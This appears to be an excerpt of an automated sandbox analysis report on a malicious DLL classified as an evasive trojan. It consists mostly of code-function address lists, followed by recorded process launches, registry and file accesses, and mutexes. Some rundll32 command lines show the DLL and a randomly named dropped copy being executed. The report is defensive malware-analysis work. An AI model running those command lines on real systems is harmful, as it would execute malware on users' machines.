                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078DDA56_2_0078DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E5A76_2_0078E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007777956_2_00777795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077B1916_2_0077B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007815916_2_00781591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00774B816_2_00774B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00778D806_2_00778D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007837826_2_00783782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077358B6_2_0077358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078DB876_2_0078DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BEA5513_2_035BEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C129113_2_035C1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B654013_2_035B6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C037013_2_035C0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ACF6E13_2_035ACF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ABD6113_2_035ABD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A4D1E13_2_035A4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ACB1313_2_035ACB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B970A13_2_035B970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE10A13_2_035BE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B590E13_2_035B590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B3D0C13_2_035B3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BBF0C13_2_035BBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AF73B13_2_035AF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BCD3513_2_035BCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA92F13_2_035AA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B912413_2_035B9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A75D213_2_035A75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A19C013_2_035A19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BEDED13_2_035BEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A51EC13_2_035A51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA3E713_2_035AA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B159113_2_035B1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AB19113_2_035AB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A779513_2_035A7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A358B13_2_035A358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B378213_2_035B3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A8D8013_2_035A8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A4B8113_2_035A4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BDB8713_2_035BDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B85B813_2_035B85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A43BE13_2_035A43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A59BF13_2_035A59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BD7BE13_2_035BD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE3B513_2_035BE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B89A213_2_035B89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE5A713_2_035BE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BDDA513_2_035BDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0BA413_2_035B0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ACE5A13_2_035ACE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A645313_2_035A6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AAA4E13_2_035AAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A544C13_2_035A544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B304313_2_035B3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AAE4313_2_035AAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B744513_2_035B7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AFA7813_2_035AFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A387F13_2_035A387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BB67713_2_035BB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A686913_2_035A6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A3A6C13_2_035A3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AEE6013_2_035AEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AB46413_2_035AB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C261E13_2_035C261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A800A13_2_035A800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BC20513_2_035BC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A243F13_2_035A243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A343213_2_035A3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A322813_2_035A3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B282D13_2_035B282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A982413_2_035A9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C1CDB13_2_035C1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B52D113_2_035B52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A90D413_2_035A90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B28D513_2_035B28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C20CE13_2_035C20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B10CD13_2_035B10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A2CC213_2_035A2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A92C113_2_035A92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A46FA13_2_035A46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A1EFB13_2_035A1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B40FE13_2_035B40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A84F013_2_035A84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B62F513_2_035B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B4CF513_2_035B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AC0EA13_2_035AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B56E913_2_035B56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A40E213_2_035A40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BA29B13_2_035BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B009A13_2_035B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE89913_2_035BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AFE9D13_2_035AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0A9313_2_035B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BCE9013_2_035BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0E9713_2_035B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AF48A13_2_035AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA08313_2_035AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BA29B26_2_009BA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B009A26_2_009B009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BCE9026_2_009BCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C129126_2_009C1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AF48A26_2_009AF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B28D526_2_009B28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C20CE26_2_009C20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B10CD26_2_009B10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A2CC226_2_009A2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A982426_2_009A9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AAA4E26_2_009AAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AAE4326_2_009AAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B744526_2_009B7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AEE6026_2_009AEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B378226_2_009B3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A4B8126_2_009A4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B89A226_2_009B89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BEDED26_2_009BEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B3D0C26_2_009B3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BBF0C26_2_009BBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AF73B26_2_009AF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C037026_2_009C0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACF6E26_2_009ACF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE89926_2_009BE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AFE9D26_2_009AFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0A9326_2_009B0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0E9726_2_009B0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA08326_2_009AA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1CDB26_2_009C1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B52D126_2_009B52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A90D426_2_009A90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A92C126_2_009A92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A46FA26_2_009A46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A1EFB26_2_009A1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B40FE26_2_009B40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A84F026_2_009A84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B62F526_2_009B62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B4CF526_2_009B4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AC0EA26_2_009AC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B56E926_2_009B56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A40E226_2_009A40E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C261E26_2_009C261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A800A26_2_009A800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BC20526_2_009BC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A243F26_2_009A243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A343226_2_009A3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A322826_2_009A3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B282D26_2_009B282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACE5A26_2_009ACE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A645326_2_009A6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BEA5526_2_009BEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A544C26_2_009A544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B304326_2_009B3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AFA7826_2_009AFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A387F26_2_009A387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BB67726_2_009BB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A686926_2_009A6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3A6C26_2_009A3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AB46426_2_009AB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B159126_2_009B1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AB19126_2_009AB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A779526_2_009A7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A358B26_2_009A358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A8D8026_2_009A8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BDB8726_2_009BDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B85B826_2_009B85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A43BE26_2_009A43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A59BF26_2_009A59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BD7BE26_2_009BD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE3B526_2_009BE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE5A726_2_009BE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BDDA526_2_009BDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B0BA426_2_009B0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A75D226_2_009A75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A19C026_2_009A19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A51EC26_2_009A51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA3E726_2_009AA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A4D1E26_2_009A4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ACB1326_2_009ACB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B970A26_2_009B970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE10A26_2_009BE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B590E26_2_009B590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BCD3526_2_009BCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009AA92F26_2_009AA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B912426_2_009B9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009B654026_2_009B6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009ABD6126_2_009ABD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ECD1DE0 appears 97 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ECEAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ECD1DE0 appears 97 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ECEAC90 appears 33 times
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: efELSMI5R4.dllVirustotal: Detection: 19%
                      Source: efELSMI5R4.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibuJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmjJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXuJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLLJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2267.tmpJump to behavior
                      Source: classification engineClassification label: mal88.troj.evad.winDLL@41/21@0/1
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009C1B99 CreateToolhelp32Snapshot,26_2_009C1B99
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:204:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6736:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5604:64:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6404
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: efELSMI5R4.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: efELSMI5R4.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.582794929.000000000058C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
